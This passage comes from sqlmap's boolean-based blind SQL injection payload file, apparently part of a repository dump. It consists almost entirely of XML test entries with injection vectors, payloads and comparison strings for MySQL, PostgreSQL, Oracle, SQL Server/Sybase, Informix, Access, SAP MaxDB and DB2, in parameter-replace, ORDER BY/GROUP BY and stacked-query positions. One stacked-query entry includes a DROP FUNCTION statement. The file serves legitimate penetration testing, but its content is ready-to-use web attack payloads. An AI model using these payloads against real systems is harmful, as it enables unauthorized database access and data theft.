DUAL)</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix boolean-based blind - Parameter replace</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Informix boolean-based blind - Parameter replace (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>\n        <request>\n            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>\n        </request>\n        <response>\n            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>\n        </response>\n        <details>\n            <dbms>Informix</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft Access boolean-based blind - Parameter replace</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>IIF([INFERENCE],[RANDNUM],1/0)</vector>\n        <request>\n            <payload>IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>\n        </request>\n        <response>\n            <comparison>IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>\n        <request>\n            <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>\n        </request>\n        <response>\n            <comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <!-- Works in MySQL, Oracle, etc. -->\n    <test>\n        <title>Boolean-based blind - Parameter replace (DUAL)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>\n        <request>\n            <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>\n        </request>\n        <response>\n            <comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>Boolean-based blind - Parameter replace (DUAL - original value)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3</clause>\n        <where>3</where>\n        <vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>\n        <request>\n            <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>\n        </request>\n        <response>\n            <comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>\n        </response>\n    </test>\n    <!-- End of boolean-based blind tests - Parameter replace -->\n\n    <!-- Works in SAP MaxDB, Informix, etc. -->\n    <test>\n        <title>Boolean-based blind - Parameter replace (CASE)</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>\n        <request>\n            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>\n        </request>\n        <response>\n            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>\n        </response>\n    </test>\n\n    <test>\n        <title>Boolean-based blind - Parameter replace (CASE - original value)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,3</clause>\n        <where>3</where>\n        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>\n        <request>\n            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>\n        </request>\n        <response>\n            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>\n        </response>\n    </test>\n    <!-- End of boolean-based blind tests - Parameter replace -->\n\n    <!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->\n    <test>\n        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <!-- It exclusively works with ORDER BY -->\n    <test>\n        <title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <!--\n         TODO: this would work for GROUP BY too if sqlmap did not enclose string-based [ORIGVALUE] with single quotes, but then other payloads would break.\n               It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is\n    -->\n    <test>\n        <!-- <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->\n        <title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <!-- <clause>2,3</clause> -->\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>\n        <request>\n            <payload>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>\n        <request>\n            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,IIF([INFERENCE],1,1/0)</vector>\n        <request>\n            <payload>,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>\n        </request>\n        <response>\n            <comparison>,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>\n        <request>\n            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>\n        </request>\n        <response>\n            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>\n        <request>\n            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>\n        </request>\n        <response>\n            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>2,3</clause>\n        <where>1</where>\n        <vector>,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>\n        <request>\n            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>\n        </request>\n        <response>\n            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 boolean-based blind - ORDER BY clause</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>\n        <request>\n            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>3</clause>\n        <where>1</where>\n        <vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>\n        <request>\n            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>\n        </request>\n        <response>\n            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <!-- Works in MySQL, Oracle, etc. -->\n    <test>\n        <title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2</clause>\n        <where>1</where>\n        <vector>HAVING [INFERENCE]</vector>\n        <request>\n            <payload>HAVING [RANDNUM]=[RANDNUM]</payload>\n        </request>\n        <response>\n            <comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>\n        </response>\n    </test>\n    <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->\n\n    <!-- Boolean-based blind tests - Stacked queries -->\n    <test>\n        <title>MySQL &gt;= 5.0 boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>\n        <request>\n            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0 boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>\n        <request>\n            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>\n        <request>\n            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->\n    <test>\n        <title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>\n        <request>\n            <payload>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <comparison>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>\n        <stype>1</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>\n        <request>\n            <payload>;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <comparison>;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>\n        <request>\n            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>\n        <request>\n            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft Access boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;IIF([INFERENCE],1,1/0)</vector>\n        <request>\n            <payload>;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>\n            <comment>%16</comment>\n        </request>\n        <response>\n            <comparison>;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>\n        </response>\n        <details>\n            <dbms>Microsoft Access</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB boolean-based blind - Stacked queries</title>\n        <stype>1</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>\n        <request>\n            <payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n    <!-- End of boolean-based blind tests - Stacked queries -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/payloads/error_based.xml",
